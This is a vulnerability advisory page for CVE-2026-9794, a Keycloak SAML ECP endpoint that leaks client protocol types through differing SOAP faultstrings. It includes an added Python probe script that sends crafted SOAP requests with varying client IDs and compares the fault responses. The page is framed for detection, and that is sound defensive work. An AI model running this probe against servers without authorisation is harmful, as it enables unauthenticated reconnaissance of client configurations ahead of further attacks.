CVE-2026-9794
Information Disclosure in Keycloak via SAML ECP Endpoint
Publication date: 2026-05-28
Last updated on: 2026-05-28
Assigner: Red Hat, Inc.
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| keycloak | keycloak | * |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-209 | The product generates an error message that includes sensitive information about its environment, users, or associated data. |
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability exists in Keycloak's SAML ECP (Security Assertion Markup Language Enhanced Client or Proxy) endpoint. A remote, unauthenticated attacker can send specially crafted SOAP requests to this endpoint, varying only the client ID named in each request.
The SOAP faultstring the endpoint returns differs depending on the client that was named. By comparing the faultstrings across requests, the attacker can determine the protocol type configured for a given client ID without any credentials. This is an information disclosure through error messages (CWE-209).
How can this vulnerability impact me?
The vulnerability allows an unauthenticated remote attacker to learn the protocol type of clients configured in a Keycloak realm by sending crafted requests and observing which faultstring comes back.
On its own this is a confidentiality issue only: it does not affect integrity or availability. The disclosed information is useful for reconnaissance, since it lets an attacker confirm which client IDs exist and how they are configured before attempting further attacks.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
The behaviour can be checked by sending the same SOAP request to the SAML ECP endpoint of the Keycloak server several times, each with a different client ID, and capturing the faultstring from each response.
If the faultstrings differ by client ID rather than being identical for every request, the server is leaking client configuration and is affected.
Specific commands are not provided in the available information.
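The following script is an added example of that check, not code from the advisory or from the Keycloak project. It builds a minimal SOAP 1.1 envelope carrying an unsigned SAML AuthnRequest, varies the client ID, extracts the faultstring from each response and reports whether the fault text depends on the client ID. The endpoint path `/realms/<realm>/protocol/saml`, the use of the `saml:Issuer` element to carry the client ID, and the sample fault bodies used for the offline run are all assumptions; the fault texts are constructed and are not Keycloak's real messages.

```python
"""Check whether a Keycloak SAML ECP endpoint returns client-ID-dependent
SOAP faultstrings (the behaviour this advisory describes).

Added example, not code from the advisory or from the Keycloak project.
Assumptions not stated on the page: the endpoint path
/realms/<realm>/protocol/saml, that the client ID is carried in the
saml:Issuer of the ECP AuthnRequest, and the sample fault bodies below,
which are constructed for the offline check.
"""
import datetime
import urllib.error
import urllib.request
import uuid
from collections import defaultdict
from xml.etree import ElementTree as ET
from xml.sax.saxutils import escape

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"


def build_ecp_envelope(client_id: str) -> bytes:
    """Minimal SOAP 1.1 envelope with an unsigned SAML 2.0 AuthnRequest whose
    Issuer is the client ID under test; only the Issuer varies between probes."""
    now = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<S:Envelope xmlns:S="{SOAP_NS}"><S:Body>'
        '<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
        'xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" '
        f'ID="_{uuid.uuid4().hex}" Version="2.0" IssueInstant="{now}">'
        f"<saml:Issuer>{escape(client_id)}</saml:Issuer>"
        "</samlp:AuthnRequest></S:Body></S:Envelope>"
    ).encode()


def parse_faultstring(body: bytes):
    """Return the SOAP 1.1 faultstring from a response body, or None when the
    body is not XML or carries no Fault. faultstring is unqualified in SOAP
    1.1, but some stacks namespace it, so both spellings are accepted."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    fault = root.find(f".//{{{SOAP_NS}}}Fault")
    if fault is None:
        return None
    node = fault.find("faultstring")
    if node is None:
        node = fault.find(f"{{{SOAP_NS}}}faultstring")
    return (node.text or "").strip() if node is not None else None


def group_by_faultstring(responses):
    """Map each distinct faultstring to the client IDs that produced it.
    More than one group means the fault text depends on the client ID."""
    groups = defaultdict(list)
    for client_id, body in responses.items():
        groups[parse_faultstring(body)].append(client_id)
    return {text: sorted(ids) for text, ids in groups.items()}


def faultstrings_differ(responses) -> bool:
    """True when the probed client IDs did not all draw the same faultstring."""
    return len(group_by_faultstring(responses)) > 1


def probe(base_url: str, realm: str, client_ids, timeout: float = 10.0) -> dict:
    """Send one ECP envelope per client ID and collect the raw response bodies.
    SOAP faults usually arrive with an HTTP 4xx/5xx, so error bodies are kept."""
    url = f"{base_url.rstrip('/')}/realms/{realm}/protocol/saml"  # assumed path
    responses = {}
    for client_id in client_ids:
        req = urllib.request.Request(
            url, data=build_ecp_envelope(client_id), method="POST",
            headers={"Content-Type": "text/xml; charset=utf-8",
                     "Accept": "text/xml, application/vnd.paos+xml"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                responses[client_id] = resp.read()
        except urllib.error.HTTPError as err:
            responses[client_id] = err.read()
    return responses


def _fault(text: str) -> bytes:
    """Build a constructed SOAP 1.1 Fault body for the offline run."""
    return (f'<S:Envelope xmlns:S="{SOAP_NS}"><S:Body><S:Fault>'
            f"<faultcode>S:Client</faultcode><faultstring>{escape(text)}</faultstring>"
            "</S:Fault></S:Body></S:Envelope>").encode()


# Constructed sample responses (not captured from Keycloak): two client IDs
# draw one fault text and a third draws another, as an affected server would.
SAMPLE_RESPONSES = {
    "client-a": _fault("constructed fault text A"),
    "client-b": _fault("constructed fault text A"),
    "client-c": _fault("constructed fault text B"),
}

if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:  # python ecp_probe.py https://kc.example.com myrealm
        bodies = probe(sys.argv[1], sys.argv[2], ["client-a", "client-b", "client-c"])
    else:
        bodies = SAMPLE_RESPONSES
    for text, ids in group_by_faultstring(bodies).items():
        print(f"{text!r}: {ids}")
    print("client-ID-dependent faultstrings:", faultstrings_differ(bodies))
```

Run it against a test realm with a mix of client IDs you know exist (SAML and OpenID Connect clients) and a few that do not; a patched server should return the same faultstring for every request, so a single group in the output means the endpoint is not distinguishing clients in its error text. Keep the probe to systems you are authorised to test.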